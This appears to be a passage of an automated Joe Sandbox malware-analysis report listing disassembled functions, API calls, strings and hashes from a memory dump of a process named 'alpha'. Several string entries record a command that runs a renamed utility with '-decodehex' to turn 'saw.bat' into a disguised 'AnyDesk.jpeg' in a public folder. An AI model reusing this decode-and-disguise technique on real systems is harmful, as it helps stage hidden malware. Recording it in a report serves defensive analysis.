                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigitiswspacewcschr
                                                                                                  • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                  • API String ID: 1595556998-2755026540
                                                                                                  • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                  • Instruction ID: fbc8f7448039f819c41ba7784a869135ce78cc80f9b59a8e4388052ce38108d4
                                                                                                  • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                  • Instruction Fuzzy Hash: 5522BD69E1C65281FA607B12A4A8279F6A0BF04793FF4417AD94D43AE4CFBCE845C731
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                  • String ID: "$=,;
                                                                                                  • API String ID: 3545743878-4143597401
                                                                                                  • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                  • Instruction ID: 571098adb341530978b79eb45e1e2b674326e52859c03c4e449c667151526290
                                                                                                  • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                  • Instruction Fuzzy Hash: BAC1C566E0965681EB657F11D024379FAA1FF44F46FE580B9CE4E03B94EFBCA845C220
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentFormatMessageThread
                                                                                                  • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                  • API String ID: 2411632146-3173542853
                                                                                                  • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                  • Instruction ID: ac4c38d14630c56fe9929e5f62f2ccda7ed27d6d5b1af9f2374a9233aa42ee7d
                                                                                                  • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                  • Instruction Fuzzy Hash: 3F618C72A0964282EA64EF51A4645B5A7A0FF44B86FE4113EDE0D03B54DFBCEA50CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3829876242-3916222277
                                                                                                  • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                  • Instruction ID: 0482164adcc7bb0307b6bd79035dee3cb905b53062f9d2a002d757b89c67f809
                                                                                                  • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                  • Instruction Fuzzy Hash: 8161A626B0864286EA54AF11E42017DFBA0FFC9B56F958178DE0D07B94DF7CE845C720
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                  • API String ID: 0-3224021485
                                                                                                  • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                  • Instruction ID: 8b178debcb7473ae01a460edb649f8a65f6e5f24254e22ac98c752dc488b6dd8
                                                                                                  • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                  • Instruction Fuzzy Hash: 5051AE24A0864395FA507B21E4242B9BBA1BF44B47FE0407AC61E57EA5DFBCA849D730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                  • String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                  • API String ID: 1606811317-344213524
                                                                                                  • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                  • Instruction ID: e00860efbd9c473a3ea2c4e64931b4596ab5695a75c1331ce6ad4181642798bb
                                                                                                  • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                  • Instruction Fuzzy Hash: 8CD1D325E08B4281EA10AB15E8542B9B7A0FF45792FF4417ADE5D13BE8DFBCE845C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ErrorLast$InformationVolume
                                                                                                  • String ID: %04X-%04X$~
                                                                                                  • API String ID: 2748242238-2468825380
                                                                                                  • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                  • Instruction ID: 6b1e7de7c1476dc56251e0df0b69927e56c78d98b626bb5d2138891ace3398d7
                                                                                                  • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                  • Instruction Fuzzy Hash: 08A1D422708BC18AEB65DF21D8502E9B7A1FB85B86F908035DA4D0BB89DF7CD645C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                  • String ID: FAT$~
                                                                                                  • API String ID: 2238823677-1832570214
                                                                                                  • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                  • Instruction ID: fc30206a72f3aeb723b97a568820c2fc98b46d0b2a1d774816f2cc26e7bdfb44
                                                                                                  • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                  • Instruction Fuzzy Hash: 1671E272708BC19AEB61DF20D8542E9B7A0FB45786FA04078DA4D4BB58DF7CD649C710
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF
                                                                                                    • Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E
                                                                                                  • towupper.MSVCRT ref: 00007FF7823FC1C9
                                                                                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FC31C
                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823FC5CB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                  • String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $PROMPT$Unknown$\$x
                                                                                                  • API String ID: 2242554020-3648267543
                                                                                                  • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                  • Instruction ID: d36a381e16ac579321e2a686f4cf5f238d215a7b8ad130d07d3b50a602b96ca8
                                                                                                  • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                  • Instruction Fuzzy Hash: D412A321A5864281EE64FB15A42017AE3A0FF44BA2FE44679DD5E03BE0DFBCE945D730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                  • String ID: \\.\
                                                                                                  • API String ID: 799470305-2900601889
                                                                                                  • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                  • Instruction ID: 271730f4e5713124116fa76b5f97b8c63fd2872904a0f578f10e2dba372c912e
                                                                                                  • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                  • Instruction Fuzzy Hash: 5251FC36A087C2A5EB60AF11E4102B9B7A0FB85B46FA54579D90D07F94DFBCD449C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1944892715-0
                                                                                                  • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                  • Instruction ID: 0890e85a024417700d4e41c860527261d59ea223de77a8e9f8574da65965236c
                                                                                                  • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                  • Instruction Fuzzy Hash: 95B1DF61A09742D6EA60BF11E464179E6A1FF44B82FE48479CA4E07BD0DEBCF885C730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823D54DE
                                                                                                  • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D552B
                                                                                                  • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D554F
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F345F
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F347E
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34C3
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F34DB
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34FA
                                                                                                    • Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
                                                                                                    • Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
                                                                                                    • Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1356649289-0
                                                                                                  • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                  • Instruction ID: a902d927f4699f31ae794a6369806cf6ad297b353383e8622069905770ddfa83
                                                                                                  • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                  • Instruction Fuzzy Hash: D991A532A0864297EB54AF11E414179FBE1FB88B82FA44179DA4E47B91DF7CE484CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                  • String ID: &()[]{}^=;!%'+,`~
                                                                                                  • API String ID: 2516562204-381716982
                                                                                                  • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                  • Instruction ID: 1bb1dea77367a6f9ddf20a61b3a2d09d60c539f1004a54ed8011d76f9f46ac1f
                                                                                                  • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                  • Instruction Fuzzy Hash: A0C1F432A1475186E750AF21E85067DB7E0FB44B95FA41139EE8E13B95DFBCE890C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
